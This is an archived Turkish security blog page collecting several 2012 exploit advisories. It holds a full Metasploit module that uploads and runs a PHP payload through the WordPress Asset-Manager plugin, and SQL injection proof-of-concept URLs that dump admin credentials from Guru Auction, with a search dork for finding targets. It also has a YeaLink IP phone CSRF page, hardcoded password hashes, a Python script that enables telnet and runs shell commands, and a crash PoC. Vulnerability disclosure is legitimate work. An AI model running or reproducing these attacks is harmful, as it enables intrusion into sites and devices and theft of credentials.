Archive for 26 Aralık 2012

WordPress Asset-Manager PHP File Upload Vulnerability

WordPress Asset-Manager PHP File Upload açığı bulunmuş olup, Metasploit remote exploit modülü aşağıdadır. Açık sayesinde sunucuya shell upload edilebilmekte ve sunucu üzerinde zararlı yazılımlar çalıştırılabilmektedir. Açık kapatılıncaya kadar upload dizinlerinin silinmesi yerinde olacaktır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit exploit module for the unauthenticated file upload in the
# WordPress Asset-Manager plugin (<= 2.0, per the Description below).
# The observable sequence on the wire, useful for detection, is a multipart
# POST to wp-content/plugins/asset-manager/upload.php (form field "Filedata")
# followed by a GET of a freshly created .php file under
# wp-content/uploads/assets/temp/. Removing or blocking that upload endpoint,
# or denying PHP execution under wp-content/uploads, mitigates the issue.
class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient
        include Msf::Exploit::PhpEXE

        # Module metadata (name, references, payload constraints, targets) and
        # the single TARGETURI option; nothing in here touches the network.
        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
                        'Description'    => %q{
                                This module exploits a vulnerability found in Asset-Manager <= 2.0   WordPress
                                plugin.  By abusing the upload.php file, a malicious user can upload a file to a
                                temp directory without authentication, which results in arbitrary code execution.
                        },
                        'Author'         =>
                                [
                                        'Sammy FORGIT', # initial discovery
                                        'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                                ],
                        'License'        => MSF_LICENSE,
                        'References'     =>
                                [
                                        [ 'OSVDB', '82653' ],
                                        [ 'BID', '53809' ],
                                        [ 'EDB', '18993' ],
                                        [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ]
                                ],
                        'Payload'            =>
                                {
                                        'BadChars' => "\x00",
                                },
                        'Platform'       => 'php',
                        'Arch'           => ARCH_PHP,
                        'Targets'        =>
                                [
                                        [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                                        [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                                ],
                        'DefaultTarget' => 0,
                        'DisclosureDate' => 'May 26 2012'))

                # TARGETURI is the WordPress base path; it defaults to '/wordpress'.
                register_options(
                        [
                                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
                        ], self.class)
        end

        # Uploads the PHP payload through the plugin's upload.php and then
        # requests the stored file to run it.
        # Aborts via fail_with(Exploit::Failure::UnexpectedReply) when the upload
        # response is missing, non-200, or does not echo the file name, and when
        # the execution request comes back with a non-200 status.
        def exploit
                # Normalise the base path so it ends with '/'. Note that << mutates
                # the String returned by target_uri.path in place.
                uri =  target_uri.path
                uri << '/' if uri[-1,1] != '/'
                peer = "#{rhost}:#{rport}"
                # Random five-letter file name with a .php extension.
                payload_name = "#{rand_text_alpha(5)}.php"
                # :unlink_self presumably makes the payload remove its own file after
                # running — confirm against Msf::Exploit::PhpEXE.
                php_payload = get_write_exec_payload(:unlink_self=>true)

                # One multipart part, field name "Filedata", carrying the payload
                # under the random file name.
                data = Rex::MIME::Message.new
                data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
                # Strip a CRLF that precedes a "--_Part_" boundary at the start of a
                # line (presumably the leading one Rex::MIME emits before the body).
                post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

                print_status("#{peer} - Uploading payload #{payload_name}")
                res = send_request_cgi({
                        'method'  => 'POST',
                        'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
                        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
                        'data'    => post_data
                })

                # The upload counts as successful only when a 200 reply echoes the
                # file name somewhere in its body.
                if not res or res.code != 200 or res.body !~ /#{payload_name}/
                        fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
                end

                print_status("#{peer} - Executing payload #{payload_name}")
                # Path where the module expects the plugin to have stored the file.
                res = send_request_raw({
                        'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
                        'method'  => 'GET'
                })

                # A missing response is tolerated here; only an explicit non-200
                # reply is an error — presumably because a running payload may
                # never send a response back.
                if res and res.code != 200
                        fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
                end
        end
end

Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Guru Auction 2.0 Multiple SQL Injection açığı bulundu. “detail.php?item_id=” parametresinde meydana gelen SQL injection açığı sayesinde birtakım verilere ulaşılabilmektedir. Açık bulucuların açığın oluşum yeri, açığın kullanımı ve açığın yarattığı tehlikelere ilişkin açıklamaları aşağıdaki şekildedir:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
                                                                                .WEB.ID
-----------------------------------------------------------------------
        Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
-----------------------------------------------------------------------
Author          : v3n0m
Site            : http://ycl.sch.id/
Date            : December, 26-2012
Location        : Yogyakarta, Indonesia
Time Zone       : GMT +7:00

Application     : Guru Auction 2.0
Price           : $49
Vendor          : http://www.guruscript.com/
Google Dork     : inurl:subcat.php?cate_id=
-----------------------------------------------------------------------

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--


Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@,1,1)=4 << false


Default Admin Page:
~~~~~~~~~~
http://domain.tld/[path]/admin/

-----------------------------------------------------------------------

Thanks:

LeQhi, lingah, Ozie, m4rc0, g0nz, L1ntang, GheMaX, chainloader, SakitJiwa, Susant, dextone, drubicza, f4c0

City Directory Review and Rating Script (search.php) SQL Injection Vulnerability

City Directory Review and Rating Script (search.php) SQL Injection açığı bulunmuş olup, açığa ilişkin açık bulucunun açıklamaları şu şekildedir:

# Exploit Title: City Directory Review and Rating Script SQL Injection Vulnerability
# Date: 22.12.2012
# Author: 3spi0n
# Script Vendor or Software Link:
http://b-scripts.com/en/18-city-reviewer-yelp-clone.html
# Category: WebApps
# Type: SQL Injection [MySQLi]
# Tested On: Ubuntu 12.10 - Win7

=================================================
# Demo: http://b-scripts.com/demo/city_reviewer/

# MySQLi Detected On:
http://server/city_reviewer/search.php?category=6


=================================================

# My Blog: www.Ryuzaki.in
# Social : 
# My Team: Grayhatz Inc. & Agedz Corp.
# Turkey.

MyBB AwayList Plugin (index.php, id parameter) SQL Injection Vulnerability

MyBB AwayList eklentisinde SQL Injection açıkları bulunmuştur. Açık, index.php?action=editAwlItem&id=[SQLi] parametresinden kaynaklanmakta olup, açık bulucunun açığın kullanımına ilişkin açıklamaları aşağıdaki şekildedir.

# Exploit Title: AwayList MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [Team Vect0r]
# Software Link: http://mods.mybb.com/view/awaylist
# Tested on: Windows & Linux.


Vulnerable code :

<?php
// Vulnerable pattern: the request value $mybb->input['id'] is concatenated
// straight into the WHERE clause, so a quote character in it changes the
// SQL statement (SQL injection).
// Mitigation: coerce the value to the type the column expects before
// building the clause (e.g. an (int) cast for a numeric id), or pass it
// through the DB layer's string-escaping helper if it is a string.
$query = $db->simple_select( // 245
        "awaylist", '*', "id = '" . $mybb->input['id'] . "'" // 246
    ); // 247
    $item = $db->fetch_array($query); // 248
?>

The variable '$mybb->input['id']' is concatenated into the query without any sanitization.

Usage : http://server/index.php?action=editAwlItem&id=[SQLi]

Shoutout to Zixem <3 & Team Vect0r :3

YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 Multiple Vulnerabilities

YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 versiyonunda [0x01] - Hidden page to enable telnet + CSRF, [0x02] - Default telnet shell users + passwords alınabilmekte, shadow okunabilmekte olup, perl exploiti ve açık bulucunun açık oluşum yerleri, açığın kullanımına ilişkin açıklamaları aşağıdaki şekildedir; [sourcecode language="plain"]#+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities # Date : 12-21-2012 # Author : xistence (xistence<[AT]>0x90.nl) # Software link : http://yealink.com/SupportDownloadfiles_detail.aspx?ProductsID=64&CateID=187&flag=142 # Vendor site : http://yealink.com # Version : 9.70.0.100 and lower # Tested on : YeaLink IP Phone SIP-T20P (hardware VoIP phone) # # Vulnerability : Multiple Vulnerabilities as described below # #+--------------------------------------------------------------------------------------------------------------------------------+ [0x01] - Hidden page to enable telnet + CSRF The hidden page http://<IP>/cgi-bin/ConfigManApp.com?Id=10 contains an option to enable Telnet on the phone. Only the "admin" user can access this page. However the unprivileged user "user" can post directly to ConfigManApp.com and enable Telnet. This default user "user" has the password "user" and is unlikely to be changed by a user. 
Also CSRF to enable this is possible: <html> <head> <title>Download</title> </head> <body> <form name="csrf" action="http://<IP>/cgi-bin/ConfigManApp.com" method="post"> <input type="hidden" name="PAGEID" value="10"/> <input type="hidden" name="CONFIG_DATA" value="1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"/> </form> <script> document.csrf.submit(); </script> </body> </html> [0x02] - Default telnet shell users + passwords The shell users are hardcoded in the firmware images and are always the same and can't be changed through the webinterface. So after enabling telnet through the hidden page shell access could go unnoticed. /etc/passwd: root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:501:501:Guest,,,:/:/bin/sh /etc/shadow: root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7::: admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7::: guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: <- password is "guest" /etc/group: root:x:0:admin,root guest:x:1:guest The file "/tmp/.htpasswd" is world readable and contains the "admin" password for the web interface. [0x03] - Exploit The following exploit logs in with the unprivileged user "user" and password "user" in the web interface. Here it enables telnet, logs in with the default user "guest" and password "guest" and executes the shell command specified. An example is to do a "cat /tmp/.htpasswd" to retrieve the admin password for the web interface. 
#!/usr/bin/python import urllib, urllib2, getpass, sys, telnetlib print "" print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 hidden page telnet enabler + default guest shell account command execution - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "" if (len(sys.argv) != 3): print "[*] Usage: " + sys.argv[0] + " <IP of Phone> <command to execute>" print "[*] i.e.:" + sys.argv[0] + " 127.0.0.1 \"cat /tmp/.htpasswd\"" print "" exit(0) phoneIP = sys.argv[1] shellCmd = sys.argv[2] phoneUrl = 'http://%s/cgi-bin/ConfigManApp.com' % phoneIP webUser = 'user' webPass = 'user' telnetUser = 'guest' telnetPass = 'guest' passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, phoneUrl, webUser, webPass) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) post_params = urllib.urlencode([("PAGEID", "10"), ("CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260")]) print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl pagehandle = urllib2.urlopen(phoneUrl, post_params) print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % ( phoneIP, telnetUser, telnetPass ) tn = telnetlib.Telnet(phoneIP) tn.read_until("IPPHONE login: ") tn.write(telnetUser + "\n") if telnetPass: tn.read_until("Password: ") tn.write(telnetPass + "\n") tn.read_until("$") print "[*] Executing shell command [ %s ]" % shellCmd tn.write( shellCmd + '\n' ) tn.read_until( shellCmd ) print tn.read_until("$").strip("$ ") tn.write("exit\n") tn.read_all() [0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC The following PoC exploit will crash the "/yealink/bin/macd" process on port "12345" #!/usr/bin/python import socket,sys,time,struct if len(sys.argv) < 2: print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd 
remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "[-] Usage: %s <target addr> " % sys.argv[0] sys.exit(0) target = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] buffer = "\x41"*75 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,12345)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "[*] Sending " + `len(buffer)` + " byte crash" s.send(buffer + "\r\n") s.recv(1024) [/sourcecode]